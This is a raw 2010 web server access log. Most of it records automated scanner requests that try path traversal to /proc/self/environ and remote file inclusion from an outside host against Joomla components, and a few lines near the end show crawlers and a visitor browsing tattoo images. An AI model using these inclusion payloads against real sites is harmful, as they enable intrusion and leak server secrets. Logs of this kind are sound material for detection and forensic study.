64.151.192.11 - - [01/Jun/2010:22:28:58 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jun/2010:22:28:58 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
91.121.201.191 - - [01/Jun/2010:22:29:11 -0500] "GET /logs/?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.803"
64.151.192.11 - - [01/Jun/2010:22:29:11 -0500] "GET /logs/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
91.121.201.191 - - [01/Jun/2010:22:29:11 -0500] "GET /?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
64.151.192.11 - - [01/Jun/2010:22:29:12 -0500] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
94.136.63.119 - - [01/Jun/2010:22:29:17 -0500] "GET /logs/access_log.1274832000/index.php?option=com_webeecomment&controller= HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.136.63.119 - - [01/Jun/2010:22:29:18 -0500] "GET /index.php?option=com_webeecomment&controller= HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.136.63.119 - - [01/Jun/2010:22:29:18 -0500] "GET /logs/index.php?option=com_webeecomment&controller= HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.136.63.119 - - [01/Jun/2010:22:29:23 -0500] "GET /logs/access_log.1274832000/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.136.63.119 - - [01/Jun/2010:22:29:23 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.136.63.119 - - [01/Jun/2010:22:29:23 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.136.63.119 - - [01/Jun/2010:22:29:39 -0500] "GET /logs/access_log.1274832000/index.php?option=com_webeecomment&controller=http://www.betheltempleag.com/images/id.jpg?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
64.151.192.11 - - [01/Jun/2010:22:29:41 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jun/2010:22:29:42 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
94.136.63.119 - - [01/Jun/2010:22:29:42 -0500] "GET /index.php?option=com_webeecomment&controller=http://www.betheltempleag.com/images/id.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.136.63.119 - - [01/Jun/2010:22:29:42 -0500] "GET /logs/index.php?option=com_webeecomment&controller=http://www.betheltempleag.com/images/id.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
174.142.68.133 - - [01/Jun/2010:22:31:04 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.142.68.133 - - [01/Jun/2010:22:31:04 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.142.68.133 - - [01/Jun/2010:22:31:06 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.142.68.133 - - [01/Jun/2010:22:31:06 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
94.136.63.119 - - [01/Jun/2010:22:31:07 -0500] "GET /logs/access_log.1274313600/index.php?option=com_webeecomment&controller= HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.136.63.119 - - [01/Jun/2010:22:31:12 -0500] "GET /logs/access_log.1274313600/index.php?option=com_webeecomment&controller=http://www.betheltempleag.com/images/id.jpg?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.136.63.119 - - [01/Jun/2010:22:31:13 -0500] "GET /logs/access_log.1274313600/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
87.249.116.188 - - [01/Jun/2010:22:32:37 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
94.23.11.114 - - [01/Jun/2010:22:33:06 -0500] "GET /?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.11.114 - - [01/Jun/2010:22:33:19 -0500] "GET /?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
91.121.201.191 - - [01/Jun/2010:22:33:21 -0500] "GET /logs/access_log.1274832000/?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
91.121.201.191 - - [01/Jun/2010:22:33:21 -0500] "GET /?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
91.121.201.191 - - [01/Jun/2010:22:33:21 -0500] "GET /logs/?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.803"
91.121.201.191 - - [01/Jun/2010:22:33:26 -0500] "GET /?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.11.114 - - [01/Jun/2010:22:34:36 -0500] "GET /logs/access_log.1274832000/?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
94.23.11.114 - - [01/Jun/2010:22:34:36 -0500] "GET /?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.11.114 - - [01/Jun/2010:22:34:36 -0500] "GET /logs/?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.803"
94.23.11.114 - - [01/Jun/2010:22:34:42 -0500] "GET /logs/access_log.1274832000/?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
94.23.11.114 - - [01/Jun/2010:22:34:42 -0500] "GET /?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
64.151.192.11 - - [01/Jun/2010:22:34:42 -0500] "GET /logs/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
94.23.11.114 - - [01/Jun/2010:22:34:42 -0500] "GET /logs/?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.803"
64.151.192.11 - - [01/Jun/2010:22:34:42 -0500] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
94.23.11.114 - - [01/Jun/2010:22:34:48 -0500] "GET /logs/?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.803"
94.23.11.114 - - [01/Jun/2010:22:34:49 -0500] "GET /logs/?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.803"
94.23.11.114 - - [01/Jun/2010:22:34:49 -0500] "GET /?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.11.114 - - [01/Jun/2010:22:34:49 -0500] "GET /?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
91.121.201.191 - - [01/Jun/2010:22:34:50 -0500] "GET /logs/?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.803"
91.121.201.191 - - [01/Jun/2010:22:34:51 -0500] "GET /?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
64.151.192.11 - - [01/Jun/2010:22:35:23 -0500] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.204.192 - - [01/Jun/2010:22:35:39 -0500] "GET /logs/access_log.1200182400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.151.192.11 - - [01/Jun/2010:22:35:40 -0500] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.249.116.188 - - [01/Jun/2010:22:35:40 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:35:40 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:36:01 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:36:22 -0500] "GET /logs/access_log.1274832000//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:36:22 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:36:23 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
91.121.201.191 - - [01/Jun/2010:22:36:23 -0500] "GET /logs/access_log.1274832000/?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
91.121.201.191 - - [01/Jun/2010:22:36:24 -0500] "GET /?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
91.121.201.191 - - [01/Jun/2010:22:36:24 -0500] "GET /logs/?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.803"
64.151.192.11 - - [01/Jun/2010:22:37:20 -0500] "GET /logs/access_log.1274832000/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jun/2010:22:37:20 -0500] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jun/2010:22:37:20 -0500] "GET /logs/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
94.23.11.114 - - [01/Jun/2010:22:37:33 -0500] "GET /logs/access_log.1274832000/?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
94.23.11.114 - - [01/Jun/2010:22:37:34 -0500] "GET /?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.11.114 - - [01/Jun/2010:22:37:34 -0500] "GET /logs/?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.803"
94.23.11.114 - - [01/Jun/2010:22:37:41 -0500] "GET /logs/access_log.1274832000/?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
94.23.11.114 - - [01/Jun/2010:22:37:42 -0500] "GET /?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.11.114 - - [01/Jun/2010:22:37:42 -0500] "GET /logs/?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.803"
91.121.145.89 - - [01/Jun/2010:22:37:48 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
64.151.192.11 - - [01/Jun/2010:22:37:53 -0500] "GET /logs/access_log.1274832000/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jun/2010:22:37:53 -0500] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jun/2010:22:37:54 -0500] "GET /logs/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.45 - - [01/Jun/2010:22:38:00 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.45 - - [01/Jun/2010:22:38:00 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.45 - - [01/Jun/2010:22:38:00 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.45 - - [01/Jun/2010:22:38:01 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
91.121.145.89 - - [01/Jun/2010:22:38:02 -0500] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [01/Jun/2010:22:38:03 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [01/Jun/2010:22:38:03 -0500] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [01/Jun/2010:22:38:03 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [01/Jun/2010:22:38:04 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.249.116.188 - - [01/Jun/2010:22:38:26 -0500] "GET /logs/index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:38:26 -0500] "GET /index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
81.93.240.45 - - [01/Jun/2010:22:38:48 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.45 - - [01/Jun/2010:22:38:48 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
91.121.145.89 - - [01/Jun/2010:22:39:12 -0500] "GET /logs/access_log.1274832000/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.121.145.89 - - [01/Jun/2010:22:39:12 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [01/Jun/2010:22:39:13 -0500] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
81.93.240.45 - - [01/Jun/2010:22:41:02 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
81.93.240.45 - - [01/Jun/2010:22:41:02 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.45 - - [01/Jun/2010:22:41:02 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.45 - - [01/Jun/2010:22:41:12 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
81.93.240.45 - - [01/Jun/2010:22:41:12 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.45 - - [01/Jun/2010:22:41:12 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.177.125 - - [01/Jun/2010:22:41:13 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.177.125 - - [01/Jun/2010:22:41:22 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
91.121.145.89 - - [01/Jun/2010:22:41:31 -0500] "GET /logs/access_log.1274832000/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.121.145.89 - - [01/Jun/2010:22:41:31 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [01/Jun/2010:22:41:31 -0500] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [01/Jun/2010:22:42:25 -0500] "GET /logs/access_log.1274832000/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.121.145.89 - - [01/Jun/2010:22:42:25 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [01/Jun/2010:22:42:26 -0500] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
114.108.177.125 - - [01/Jun/2010:22:42:42 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.177.125 - - [01/Jun/2010:22:42:43 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.177.125 - - [01/Jun/2010:22:42:43 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
91.121.145.89 - - [01/Jun/2010:22:42:46 -0500] "GET /logs/access_log.1274832000/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.121.145.89 - - [01/Jun/2010:22:42:46 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [01/Jun/2010:22:42:47 -0500] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
207.46.13.92 - - [01/Jun/2010:22:42:48 -0500] "GET /logs/access_log.1208822400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.186.60.116 - - [01/Jun/2010:22:42:52 -0500] "GET /logs/index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
114.108.177.125 - - [01/Jun/2010:22:42:59 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.177.125 - - [01/Jun/2010:22:43:00 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.177.125 - - [01/Jun/2010:22:43:01 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
213.186.60.116 - - [01/Jun/2010:22:43:01 -0500] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.136.63.119 - - [01/Jun/2010:22:43:10 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
213.186.60.116 - - [01/Jun/2010:22:44:11 -0500] "GET /logs/index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
213.186.60.116 - - [01/Jun/2010:22:44:12 -0500] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
81.93.240.45 - - [01/Jun/2010:22:44:33 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
81.93.240.45 - - [01/Jun/2010:22:44:33 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.45 - - [01/Jun/2010:22:44:33 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.45 - - [01/Jun/2010:22:44:34 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
81.93.240.45 - - [01/Jun/2010:22:44:34 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.45 - - [01/Jun/2010:22:44:34 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
213.186.60.116 - - [01/Jun/2010:22:45:43 -0500] "GET /logs/index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
213.186.60.116 - - [01/Jun/2010:22:45:44 -0500] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.250.255.243 - - [01/Jun/2010:22:46:00 -0500] "GET /logs/access_log.1272585600 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.52 - - [01/Jun/2010:22:47:11 -0500] "GET /logs/access_log.1219708800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.201 - - [01/Jun/2010:22:47:37 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.136.63.119 - - [01/Jun/2010:22:48:44 -0500] "GET /logs/access_log.1273017600/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.136.63.119 - - [01/Jun/2010:22:48:45 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.136.63.119 - - [01/Jun/2010:22:48:45 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
72.84.40.35 - - [01/Jun/2010:22:50:10 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://search.yahoo.com/search;_ylt=A0geupju1AVMhp8AV9FXNyoA?fr2=sg-gac&sado=1&p=vintage%20tattoo%20flash&fr=yfp-t-701&pqstr=vintage%20tattoo&sac=1&sao=1""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:50:10 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:50:18 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:50:19 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:50:19 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:50:19 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:50:19 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
